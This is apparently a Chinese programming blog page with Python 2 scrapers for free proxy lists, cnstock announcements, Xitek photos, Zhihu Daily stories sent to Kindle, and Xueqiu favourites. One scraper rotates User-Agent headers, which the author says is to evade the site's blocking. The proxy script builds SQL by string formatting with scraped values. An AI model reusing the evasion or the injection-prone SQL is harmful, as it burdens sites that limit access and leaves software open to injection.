接着完成判断代理是否有效 #查看爬到的代理IP是否还能用
def isAlive(self,ip,port):
proxy={'http':ip+':'+port}
print proxy

#使用这个方式是全局方法。
proxy_support=urllib2.ProxyHandler(proxy)
opener=urllib2.build_opener(proxy_support)
urllib2.install_opener(opener)
#使用代理访问腾讯官网,进行验证代理是否有效
test_url="http://www.qq.com"
req=urllib2.Request(test_url,headers=self.header)
try:
#timeout 设置为10,如果你不能忍受你的代理延时超过10,就修改timeout的数字
resp=urllib2.urlopen(req,timeout=10)

if resp.code==200:
print "work"
return True
else:
print "not work"
return False
except :
print "Not work"
return False
 获取前面多少也的代理IP,用一个循环即可: def loop(self,page):
for i in range(1,page):
self.getContent(i)
更新2016-08-13
接着实现对已有的数据库进行清洗,失效的代理要移除。 待续。。。
 
 
 
调用类实例:设置爬取前面5页的代理ipif __name__ == "__main__":
now = datetime.datetime.now()
print "Start at %s" % now
obj=getProxy()
obj.loop(5)


获取最新source code,可以到
https://github.com/Rockyzsu/getProxy 
sync up 查看全部
默认获取前5页的代理IP,验证其是否有效,然后使用sqlite存储为本地db文件。

 
 

proxy.PNG
 
class getProxy():

def __init__(self):
self.user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
self.header = {"User-Agent": self.user_agent}
self.dbname="proxy.db"
self.now = time.strftime("%Y-%m-%d")

def getContent(self, num):
nn_url = "http://www.xicidaili.com/nn/" + str(num)
#国内高匿
req = urllib2.Request(nn_url, headers=self.header)
resp = urllib2.urlopen(req, timeout=10)
content = resp.read()
et = etree.HTML(content)
result_even = et.xpath('//tr[@class=""]')
result_odd = et.xpath('//tr[@class="odd"]')
#因为网页源码中class 分开了奇偶两个class,所以使用lxml最方便的方式就是分开获取。
#刚开始我使用一个方式获取,因而出现很多不对称的情况,估计是网站会经常修改源码,怕被其他爬虫的抓到
#使用上面的方法可以不管网页怎么改,都可以抓到ip 和port
for i in result_even:
t1 = i.xpath("./td/text()")[:2]
print "IP:%s\tPort:%s" % (t1[0], t1[1])
if self.isAlive(t1[0], t1[1]):

self.insert_db(self.now,t1[0],t1[1])
for i in result_odd:
t2 = i.xpath("./td/text()")[:2]
print "IP:%s\tPort:%s" % (t2[0], t2[1])
if self.isAlive(t2[0], t2[1]):
self.insert_db(self.now,t2[0],t2[1])

接着实现写插入数据库函数:
def insert_db(self,date,ip,port):
dbname=self.dbname
try:
conn=sqlite3.connect(dbname)
except:
print "Error to open database%" %self.dbname
create_tb='''
CREATE TABLE IF NOT EXISTS PROXY
(DATE TEXT,
IP TEXT,
PORT TEXT
);
'''
conn.execute(create_tb)
insert_db_cmd='''
INSERT INTO PROXY (DATE,IP,PORT) VALUES ('%s','%s','%s');
''' %(date,ip,port) #写入时间,ip和端口
conn.execute(insert_db_cmd)
conn.commit() #记得commit
conn.close()





接着完成判断代理是否有效
 #查看爬到的代理IP是否还能用
def isAlive(self,ip,port):
proxy={'http':ip+':'+port}
print proxy

#使用这个方式是全局方法。
proxy_support=urllib2.ProxyHandler(proxy)
opener=urllib2.build_opener(proxy_support)
urllib2.install_opener(opener)
#使用代理访问腾讯官网,进行验证代理是否有效
test_url="http://www.qq.com"
req=urllib2.Request(test_url,headers=self.header)
try:
#timeout 设置为10,如果你不能忍受你的代理延时超过10,就修改timeout的数字
resp=urllib2.urlopen(req,timeout=10)

if resp.code==200:
print "work"
return True
else:
print "not work"
return False
except :
print "Not work"
return False

 获取前面多少也的代理IP,用一个循环即可:
    def loop(self,page):
for i in range(1,page):
self.getContent(i)

更新2016-08-13
接着实现对已有的数据库进行清洗,失效的代理要移除。 待续。。。
 
 
 
调用类实例:设置爬取前面5页的代理ip
if __name__ == "__main__":
now = datetime.datetime.now()
print "Start at %s" % now
obj=getProxy()
obj.loop(5)



获取最新source code,可以到
https://github.com/Rockyzsu/getProxy 
sync up

python 获取 中国证券网 的公告

李魔佛 发表了文章 • 11 个评论 • 11025 次浏览 • 2016-06-30 15:45 • 来自相关话题

中国证券网: http://ggjd.cnstock.com/
这个网站的公告会比同花顺东方财富的早一点,而且还出现过早上中国证券网已经发了公告,而东财却拿去做午间公告,以至于可以提前获取公告提前埋伏。
 
现在程序自动把抓取的公告存入本网站中:http://30daydo.com/news.php 
每天早上8:30更新一次。
 
生成的公告保存在stock/文件夹下,以日期命名。 下面脚本是循坏检测,如果有新的公告就会继续生成。
 
默认保存前3页的公告。(一次过太多页会被网站暂时屏蔽几分钟)。 代码以及使用了切换header来躲避网站的封杀。
 
修改
getInfo(3) 里面的数字就可以抓取前面某页数据
 
 




__author__ = 'rocchen'
# working v1.0
from bs4 import BeautifulSoup
import urllib2, datetime, time, codecs, cookielib, random, threading
import os,sys


def getInfo(max_index_user=5):
stock_news_site =
"http://ggjd.cnstock.com/gglist/search/ggkx/"

my_userAgent = [
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)']
index = 0
max_index = max_index_user
num = 1
temp_time = time.strftime("[%Y-%m-%d]-[%H-%M]", time.localtime())

store_filename = "StockNews-%s.log" % temp_time
fOpen = codecs.open(store_filename, 'w', 'utf-8')

while index < max_index:
user_agent = random.choice(my_userAgent)
# print user_agent
company_news_site = stock_news_site + str(index)
# content = urllib2.urlopen(company_news_site)
headers = {'User-Agent': user_agent, 'Host': "ggjd.cnstock.com", 'DNT': '1',
'Accept': 'text/html, application/xhtml+xml, */*', }
req = urllib2.Request(url=company_news_site, headers=headers)
resp = None
raw_content = ""
try:
resp = urllib2.urlopen(req, timeout=30)

except urllib2.HTTPError as e:
e.fp.read()
except urllib2.URLError as e:
if hasattr(e, 'code'):
print "error code %d" % e.code
elif hasattr(e, 'reason'):
print "error reason %s " % e.reason

finally:
if resp:
raw_content = resp.read()
time.sleep(2)
resp.close()

soup = BeautifulSoup(raw_content, "html.parser")
all_content = soup.find_all("span", "time")

for i in all_content:
news_time = i.string
node = i.next_sibling
str_temp = "No.%s \n%s\t%s\n---> %s \n\n" % (str(num), news_time, node['title'], node['href'])
#print "inside %d" %num
#print str_temp
fOpen.write(str_temp)
num = num + 1

#print "index %d" %index
index = index + 1

fOpen.close()


def execute_task(n=60):
period = int(n)
while True:
print datetime.datetime.now()
getInfo(3)

time.sleep(60 * period)



if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "stock")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)
start_time = time.time() # user can change the max index number getInfo(10), by default is getInfo(5)
if len(sys.argv) <2:
n = raw_input("Input Period : ? mins to download every cycle")
else:
n=int(sys.argv[1])
execute_task(n)
end_time = time.time()
print "Total time: %s s." % str(round((end_time - start_time), 4))


 
github:https://github.com/Rockyzsu/cnstock
  查看全部
中国证券网: http://ggjd.cnstock.com/
这个网站的公告会比同花顺东方财富的早一点,而且还出现过早上中国证券网已经发了公告,而东财却拿去做午间公告,以至于可以提前获取公告提前埋伏。
 
现在程序自动把抓取的公告存入本网站中:http://30daydo.com/news.php 
每天早上8:30更新一次。
 
生成的公告保存在stock/文件夹下,以日期命名。 下面脚本是循坏检测,如果有新的公告就会继续生成。
 
默认保存前3页的公告。(一次过太多页会被网站暂时屏蔽几分钟)。 代码以及使用了切换header来躲避网站的封杀。
 
修改
getInfo(3) 里面的数字就可以抓取前面某页数据
 
 

公告.PNG
__author__ = 'rocchen'
# working v1.0
from bs4 import BeautifulSoup
import urllib2, datetime, time, codecs, cookielib, random, threading
import os,sys


def getInfo(max_index_user=5):
stock_news_site =
"http://ggjd.cnstock.com/gglist/search/ggkx/"

my_userAgent = [
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)']
index = 0
max_index = max_index_user
num = 1
temp_time = time.strftime("[%Y-%m-%d]-[%H-%M]", time.localtime())

store_filename = "StockNews-%s.log" % temp_time
fOpen = codecs.open(store_filename, 'w', 'utf-8')

while index < max_index:
user_agent = random.choice(my_userAgent)
# print user_agent
company_news_site = stock_news_site + str(index)
# content = urllib2.urlopen(company_news_site)
headers = {'User-Agent': user_agent, 'Host': "ggjd.cnstock.com", 'DNT': '1',
'Accept': 'text/html, application/xhtml+xml, */*', }
req = urllib2.Request(url=company_news_site, headers=headers)
resp = None
raw_content = ""
try:
resp = urllib2.urlopen(req, timeout=30)

except urllib2.HTTPError as e:
e.fp.read()
except urllib2.URLError as e:
if hasattr(e, 'code'):
print "error code %d" % e.code
elif hasattr(e, 'reason'):
print "error reason %s " % e.reason

finally:
if resp:
raw_content = resp.read()
time.sleep(2)
resp.close()

soup = BeautifulSoup(raw_content, "html.parser")
all_content = soup.find_all("span", "time")

for i in all_content:
news_time = i.string
node = i.next_sibling
str_temp = "No.%s \n%s\t%s\n---> %s \n\n" % (str(num), news_time, node['title'], node['href'])
#print "inside %d" %num
#print str_temp
fOpen.write(str_temp)
num = num + 1

#print "index %d" %index
index = index + 1

fOpen.close()


def execute_task(n=60):
period = int(n)
while True:
print datetime.datetime.now()
getInfo(3)

time.sleep(60 * period)



if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "stock")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)
start_time = time.time() # user can change the max index number getInfo(10), by default is getInfo(5)
if len(sys.argv) <2:
n = raw_input("Input Period : ? mins to download every cycle")
else:
n=int(sys.argv[1])
execute_task(n)
end_time = time.time()
print "Total time: %s s." % str(round((end_time - start_time), 4))


 
github:https://github.com/Rockyzsu/cnstock
 

python 批量获取色影无忌 获奖图片

李魔佛 发表了文章 • 6 个评论 • 9447 次浏览 • 2016-06-29 16:41 • 来自相关话题

色影无忌上的图片很多都可以直接拿来做壁纸的,而且发布面不会太广,基本不会和市面上大部分的壁纸或者图片素材重复。 关键还没有水印。 这么良心的图片服务商哪里找呀~~
 

 





 
不多说,直接来代码:#-*-coding=utf-8-*-
__author__ = 'rocky chen'
from bs4 import BeautifulSoup
import urllib2,sys,StringIO,gzip,time,random,re,urllib,os
reload(sys)
sys.setdefaultencoding('utf-8')
class Xitek():
    def __init__(self):
        self.url="http://photo.xitek.com/"
        user_agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        self.headers={"User-Agent":user_agent}
        self.last_page=self.__get_last_page()


    def __get_last_page(self):
        html=self.__getContentAuto(self.url)
        bs=BeautifulSoup(html,"html.parser")
        page=bs.find_all('a',class_="blast")
        last_page=page[0]['href'].split('/')[-1]
        return int(last_page)


    def __getContentAuto(self,url):
        req=urllib2.Request(url,headers=self.headers)
        resp=urllib2.urlopen(req)
        #time.sleep(2*random.random())
        content=resp.read()
        info=resp.info().get("Content-Encoding")
        if info==None:
            return content
        else:
            t=StringIO.StringIO(content)
            gziper=gzip.GzipFile(fileobj=t)
            html = gziper.read()
            return html

    #def __getFileName(self,stream):


    def __download(self,url):
        p=re.compile(r'href="(/photoid/\d+)"')
        #html=self.__getContentNoZip(url)

        html=self.__getContentAuto(url)

        content = p.findall(html)
        for i in content:
            print i

            photoid=self.__getContentAuto(self.url+i)
            bs=BeautifulSoup(photoid,"html.parser")
            final_link=bs.find('img',class_="mimg")['src']
            print final_link
            #pic_stream=self.__getContentAuto(final_link)
            title=bs.title.string.strip()
            filename = re.sub('[\/:*?"<>|]', '-', title)
            filename=filename+'.jpg'
            urllib.urlretrieve(final_link,filename)
            #f=open(filename,'w')
            #f.write(pic_stream)
            #f.close()
        #print html
        #bs=BeautifulSoup(html,"html.parser")
        #content=bs.find_all(p)
        #for i in content:
        #    print i
        '''
        print bs.title
        element_link=bs.find_all('div',class_="element")
        print len(element_link)
        k=1
        for href in element_link:

            #print type(href)
            #print href.tag
        '''
        '''
            if href.children[0]:
                print href.children[0]
        '''
        '''
            t=0

            for i in href.children:
                #if i.a:
                if t==0:
                    #print k
                    if i['href']
                    print link

                        if p.findall(link):
                            full_path=self.url[0:len(self.url)-1]+link
                            sub_html=self.__getContent(full_path)
                            bs=BeautifulSoup(sub_html,"html.parser")
                            final_link=bs.find('img',class_="mimg")['src']
                            #time.sleep(2*random.random())
                            print final_link
                    #k=k+1
                #print type(i)
                #print i.tag
                #if hasattr(i,"href"):
                    #print i['href']
                #print i.tag
                t=t+1
                #print "*"

        '''

        '''
            if href:
                if href.children:
                    print href.children[0]
        '''
            #print "one element link"



    def getPhoto(self):

        start=0
        #use style/0
        photo_url="http://photo.xitek.com/style/0/p/"
        for i in range(start,self.last_page+1):
            url=photo_url+str(i)
            print url
            #time.sleep(1)
            self.__download(url)

        '''
        url="http://photo.xitek.com/style/0/p/10"
        self.__download(url)
        '''
        #url="http://photo.xitek.com/style/0/p/0"
        #html=self.__getContent(url)
        #url="http://photo.xitek.com/"
        #html=self.__getContentNoZip(url)
        #print html
        #'''
def main():
    sub_folder = os.path.join(os.getcwd(), "content")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)
    obj=Xitek()
    obj.getPhoto()


if __name__=="__main__":
    main()








下载后在content文件夹下会自动抓取所有图片。 (色影无忌的服务器没有做任何的屏蔽处理,所以脚本不能跑那么快,可以适当调用sleep函数,不要让服务器压力那么大)
 
已经下载好的图片:





 
 
github: https://github.com/Rockyzsu/fetchXitek   (欢迎前来star) 查看全部
色影无忌上的图片很多都可以直接拿来做壁纸的,而且发布面不会太广,基本不会和市面上大部分的壁纸或者图片素材重复。 关键还没有水印。 这么良心的图片服务商哪里找呀~~
 

 

色影无忌_副本.png

 
不多说,直接来代码:
#-*-coding=utf-8-*-
__author__ = 'rocky chen'
from bs4 import BeautifulSoup
import urllib2,sys,StringIO,gzip,time,random,re,urllib,os
reload(sys)
sys.setdefaultencoding('utf-8')
class Xitek():
    def __init__(self):
        self.url="http://photo.xitek.com/"
        user_agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        self.headers={"User-Agent":user_agent}
        self.last_page=self.__get_last_page()


    def __get_last_page(self):
        html=self.__getContentAuto(self.url)
        bs=BeautifulSoup(html,"html.parser")
        page=bs.find_all('a',class_="blast")
        last_page=page[0]['href'].split('/')[-1]
        return int(last_page)


    def __getContentAuto(self,url):
        req=urllib2.Request(url,headers=self.headers)
        resp=urllib2.urlopen(req)
        #time.sleep(2*random.random())
        content=resp.read()
        info=resp.info().get("Content-Encoding")
        if info==None:
            return content
        else:
            t=StringIO.StringIO(content)
            gziper=gzip.GzipFile(fileobj=t)
            html = gziper.read()
            return html

    #def __getFileName(self,stream):


    def __download(self,url):
        p=re.compile(r'href="(/photoid/\d+)"')
        #html=self.__getContentNoZip(url)

        html=self.__getContentAuto(url)

        content = p.findall(html)
        for i in content:
            print i

            photoid=self.__getContentAuto(self.url+i)
            bs=BeautifulSoup(photoid,"html.parser")
            final_link=bs.find('img',class_="mimg")['src']
            print final_link
            #pic_stream=self.__getContentAuto(final_link)
            title=bs.title.string.strip()
            filename = re.sub('[\/:*?"<>|]', '-', title)
            filename=filename+'.jpg'
            urllib.urlretrieve(final_link,filename)
            #f=open(filename,'w')
            #f.write(pic_stream)
            #f.close()
        #print html
        #bs=BeautifulSoup(html,"html.parser")
        #content=bs.find_all(p)
        #for i in content:
        #    print i
        '''
        print bs.title
        element_link=bs.find_all('div',class_="element")
        print len(element_link)
        k=1
        for href in element_link:

            #print type(href)
            #print href.tag
        '''
        '''
            if href.children[0]:
                print href.children[0]
        '''
        '''
            t=0

            for i in href.children:
                #if i.a:
                if t==0:
                    #print k
                    if i['href']
                    print link

                        if p.findall(link):
                            full_path=self.url[0:len(self.url)-1]+link
                            sub_html=self.__getContent(full_path)
                            bs=BeautifulSoup(sub_html,"html.parser")
                            final_link=bs.find('img',class_="mimg")['src']
                            #time.sleep(2*random.random())
                            print final_link
                    #k=k+1
                #print type(i)
                #print i.tag
                #if hasattr(i,"href"):
                    #print i['href']
                #print i.tag
                t=t+1
                #print "*"

        '''

        '''
            if href:
                if href.children:
                    print href.children[0]
        '''
            #print "one element link"



    def getPhoto(self):

        start=0
        #use style/0
        photo_url="http://photo.xitek.com/style/0/p/"
        for i in range(start,self.last_page+1):
            url=photo_url+str(i)
            print url
            #time.sleep(1)
            self.__download(url)

        '''
        url="http://photo.xitek.com/style/0/p/10"
        self.__download(url)
        '''
        #url="http://photo.xitek.com/style/0/p/0"
        #html=self.__getContent(url)
        #url="http://photo.xitek.com/"
        #html=self.__getContentNoZip(url)
        #print html
        #'''
def main():
    sub_folder = os.path.join(os.getcwd(), "content")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)
    obj=Xitek()
    obj.getPhoto()


if __name__=="__main__":
    main()








下载后在content文件夹下会自动抓取所有图片。 (色影无忌的服务器没有做任何的屏蔽处理,所以脚本不能跑那么快,可以适当调用sleep函数,不要让服务器压力那么大)
 
已经下载好的图片:

色影无忌2_副本1.png

 
 
github: https://github.com/Rockyzsu/fetchXitek   (欢迎前来star)

抓取 知乎日报 中的 大误 系类文章,生成电子书推送到kindle

李魔佛 发表了文章 • 0 个评论 • 2866 次浏览 • 2016-06-12 08:52 • 来自相关话题

无意中看了知乎日报的大误系列的一篇文章,之后就停不下来了,大误是虚构故事,知乎上神人虚构故事的功力要高于网络上的很多写手啊!! 看的欲罢不能,不过还是那句,手机屏幕太小,连续看几个小时很疲劳,而且每次都要联网去看。 
 
所以写了下面的python脚本,一劳永逸。 脚本抓取大误从开始到现在的所有文章,并推送到你自己的kindle账号。
 




# -*- coding=utf-8 -*-
__author__ = 'rocky @ www.30daydo.com'
import urllib2, re, os, codecs,sys,datetime
from bs4 import BeautifulSoup
# example https://zhhrb.sinaapp.com/index.php?date=20160610
from mail_template import MailAtt
reload(sys)
sys.setdefaultencoding('utf-8')

def save2file(filename, content):
filename = filename + ".txt"
f = codecs.open(filename, 'a', encoding='utf-8')
f.write(content)
f.close()


def getPost(date_time, filter_p):
url = 'https://zhhrb.sinaapp.com/index.php?date=' + date_time
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)
resp = urllib2.urlopen(req)
content = resp.read()
p = re.compile('<h2 class="question-title">(.*)</h2></br></a>')
result = re.findall(p, content)
count = -1
row = -1
for i in result:
#print i
return_content = re.findall(filter_p, i)

if return_content:
row = count
break
#print return_content[0]
count = count + 1
#print row
if row == -1:
return 0
link_p = re.compile('<a href="(.*)" target="_blank" rel="nofollow">')
link_result = re.findall(link_p, content)[row + 1]
print link_result
result_req = urllib2.Request(link_result, headers=header)
result_resp = urllib2.urlopen(result_req)
#result_content= result_resp.read()
#print result_content

bs = BeautifulSoup(result_resp, "html.parser")
title = bs.title.string.strip()
#print title
filename = re.sub('[\/:*?"<>|]', '-', title)
print filename
print date_time
save2file(filename, title)
save2file(filename, "\n\n\n\n--------------------%s Detail----------------------\n\n" %date_time)

detail_content = bs.find_all('div', class_='content')

for i in detail_content:
#print i
save2file(filename,"\n\n-------------------------answer -------------------------\n\n")
for j in i.strings:

save2file(filename, j)

smtp_server = 'smtp.126.com'
from_mail = sys.argv[1]
password = sys.argv[2]
to_mail = 'jinweizsu@kindle.cn'
send_kindle = MailAtt(smtp_server, from_mail, password, to_mail)
send_kindle.send_txt(filename)


def main():
sub_folder = os.path.join(os.getcwd(), "content")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)


date_time = '20160611'
filter_p = re.compile('大误.*')
ori_day=datetime.date(datetime.date.today().year,01,01)
t=datetime.date(datetime.date.today().year,datetime.date.today().month,datetime.date.today().day)
delta=(t-ori_day).days
print delta
for i in range(delta):
day=datetime.date(datetime.date.today().year,01,01)+datetime.timedelta(i)
getPost(day.strftime("%Y%m%d"),filter_p)
#getPost(date_time, filter_p)

if __name__ == "__main__":
main()




github: https://github.com/Rockyzsu/zhihu_daily__kindle
 
上面的代码可以稍作修改,就可以抓取瞎扯或者深夜食堂的系列文章。
 
附福利:
http://pan.baidu.com/s/1kVewz59
所有的知乎日报的大误文章。(截止2016/6/12日) 查看全部
无意中看了知乎日报的大误系列的一篇文章,之后就停不下来了,大误是虚构故事,知乎上神人虚构故事的功力要高于网络上的很多写手啊!! 看的欲罢不能,不过还是那句,手机屏幕太小,连续看几个小时很疲劳,而且每次都要联网去看。 
 
所以写了下面的python脚本,一劳永逸。 脚本抓取大误从开始到现在的所有文章,并推送到你自己的kindle账号。
 

大误.JPG
# -*- coding=utf-8 -*-
__author__ = 'rocky @ www.30daydo.com'
import urllib2, re, os, codecs,sys,datetime
from bs4 import BeautifulSoup
# example https://zhhrb.sinaapp.com/index.php?date=20160610
from mail_template import MailAtt
reload(sys)
sys.setdefaultencoding('utf-8')

def save2file(filename, content):
filename = filename + ".txt"
f = codecs.open(filename, 'a', encoding='utf-8')
f.write(content)
f.close()


def getPost(date_time, filter_p):
url = 'https://zhhrb.sinaapp.com/index.php?date=' + date_time
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)
resp = urllib2.urlopen(req)
content = resp.read()
p = re.compile('<h2 class="question-title">(.*)</h2></br></a>')
result = re.findall(p, content)
count = -1
row = -1
for i in result:
#print i
return_content = re.findall(filter_p, i)

if return_content:
row = count
break
#print return_content[0]
count = count + 1
#print row
if row == -1:
return 0
link_p = re.compile('<a href="(.*)" target="_blank" rel="nofollow">')
link_result = re.findall(link_p, content)[row + 1]
print link_result
result_req = urllib2.Request(link_result, headers=header)
result_resp = urllib2.urlopen(result_req)
#result_content= result_resp.read()
#print result_content

bs = BeautifulSoup(result_resp, "html.parser")
title = bs.title.string.strip()
#print title
filename = re.sub('[\/:*?"<>|]', '-', title)
print filename
print date_time
save2file(filename, title)
save2file(filename, "\n\n\n\n--------------------%s Detail----------------------\n\n" %date_time)

detail_content = bs.find_all('div', class_='content')

for i in detail_content:
#print i
save2file(filename,"\n\n-------------------------answer -------------------------\n\n")
for j in i.strings:

save2file(filename, j)

smtp_server = 'smtp.126.com'
from_mail = sys.argv[1]
password = sys.argv[2]
to_mail = 'jinweizsu@kindle.cn'
send_kindle = MailAtt(smtp_server, from_mail, password, to_mail)
send_kindle.send_txt(filename)


def main():
sub_folder = os.path.join(os.getcwd(), "content")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)


date_time = '20160611'
filter_p = re.compile('大误.*')
ori_day=datetime.date(datetime.date.today().year,01,01)
t=datetime.date(datetime.date.today().year,datetime.date.today().month,datetime.date.today().day)
delta=(t-ori_day).days
print delta
for i in range(delta):
day=datetime.date(datetime.date.today().year,01,01)+datetime.timedelta(i)
getPost(day.strftime("%Y%m%d"),filter_p)
#getPost(date_time, filter_p)

if __name__ == "__main__":
main()




github: https://github.com/Rockyzsu/zhihu_daily__kindle
 
上面的代码可以稍作修改,就可以抓取瞎扯或者深夜食堂的系列文章。
 
附福利:
http://pan.baidu.com/s/1kVewz59
所有的知乎日报的大误文章。(截止2016/6/12日)

python雪球爬虫 抓取雪球 大V的所有文章 推送到kindle

李魔佛 发表了文章 • 0 个评论 • 7462 次浏览 • 2016-05-29 00:06 • 来自相关话题

30天内完成。 开始日期:2016年5月28日
 
因为雪球上喷子很多,不少大V都不堪忍受,被喷的删帖离开。 比如 易碎品,小小辛巴。
所以利用python可以有效便捷的抓取想要的大V发言内容,并保存到本地。也方便自己检索,考证(有些伪大V喜欢频繁删帖,比如今天预测明天大盘大涨,明天暴跌后就把昨天的预测给删掉,给后来者造成的错觉改大V每次都能精准预测)。 
 
下面以 抓取狂龙的帖子为例(狂龙最近老是掀人家庄家的老底,哈)
 
https://xueqiu.com/4742988362 
 
2017年2月20日更新:
爬取雪球上我的收藏的文章,并生成电子书。
(PS:收藏夹中一些文章已经被作者删掉了 - -|, 这速度也蛮快了呀。估计是以前写的现在怕被放出来打脸)
 




# -*-coding=utf-8-*-
#抓取雪球的收藏文章
__author__ = 'Rocky'
import requests,cookielib,re,json,time
from toolkit import Toolkit
from lxml import etree
url='https://xueqiu.com/snowman/login'
session = requests.session()

session.cookies = cookielib.LWPCookieJar(filename="cookies")
try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

agent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers = {'Host': 'xueqiu.com',
'Referer': 'https://xueqiu.com/',
'Origin':'https://xueqiu.com',
'User-Agent': agent}
account=Toolkit.getUserData('data.cfg')
print account['snowball_user']
print account['snowball_password']

data={'username':account['snowball_user'],'password':account['snowball_password']}
s=session.post(url,data=data,headers=headers)
print s.status_code
#print s.text
session.cookies.save()
fav_temp='https://xueqiu.com/favs?page=1'
collection=session.get(fav_temp,headers=headers)
fav_content= collection.text
p=re.compile('"maxPage":(\d+)')
maxPage=p.findall(fav_content)[0]
print maxPage
print type(maxPage)
maxPage=int(maxPage)
print type(maxPage)
for i in range(1,maxPage+1):
fav='https://xueqiu.com/favs?page=%d' %i
collection=session.get(fav,headers=headers)
fav_content= collection.text
#print fav_content
p=re.compile('var favs = {(.*?)};',re.S|re.M)
result=p.findall(fav_content)[0].strip()

new_result='{'+result+'}'
#print type(new_result)
#print new_result
data=json.loads(new_result)
use_data= data['list']
host='https://xueqiu.com'
for i in use_data:
url=host+ i['target']
print url
txt_content=session.get(url,headers=headers).text
#print txt_content.text

tree=etree.HTML(txt_content)
title=tree.xpath('//title/text()')[0]

filename = re.sub('[\/:*?"<>|]', '-', title)
print filename

content=tree.xpath('//div[@class="detail"]')
for i in content:
Toolkit.save2filecn(filename, i.xpath('string(.)'))
#print content
#Toolkit.save2file(filename,)
time.sleep(10)





 
用法:
1. snowball.py -- 抓取雪球上我的收藏的文章
使用: 创建一个data.cfg的文件,里面格式如下:
snowball_user=xxxxx@xx.com
snowball_password=密码

然后运行python snowball.py ,会自动登录雪球,然后 在当前目录生产txt文件。
 
github代码:https://github.com/Rockyzsu/xueqiu 查看全部
30天内完成。 开始日期:2016年5月28日
 
因为雪球上喷子很多,不少大V都不堪忍受,被喷的删帖离开。 比如 易碎品,小小辛巴。
所以利用python可以有效便捷的抓取想要的大V发言内容,并保存到本地。也方便自己检索,考证(有些伪大V喜欢频繁删帖,比如今天预测明天大盘大涨,明天暴跌后就把昨天的预测给删掉,给后来者造成的错觉改大V每次都能精准预测)。 
 
下面以 抓取狂龙的帖子为例(狂龙最近老是掀人家庄家的老底,哈)
 
https://xueqiu.com/4742988362 
 
2017年2月20日更新:
爬取雪球上我的收藏的文章,并生成电子书。
(PS:收藏夹中一些文章已经被作者删掉了 - -|, 这速度也蛮快了呀。估计是以前写的现在怕被放出来打脸)
 

雪球的爬虫.PNG
# -*-coding=utf-8-*-
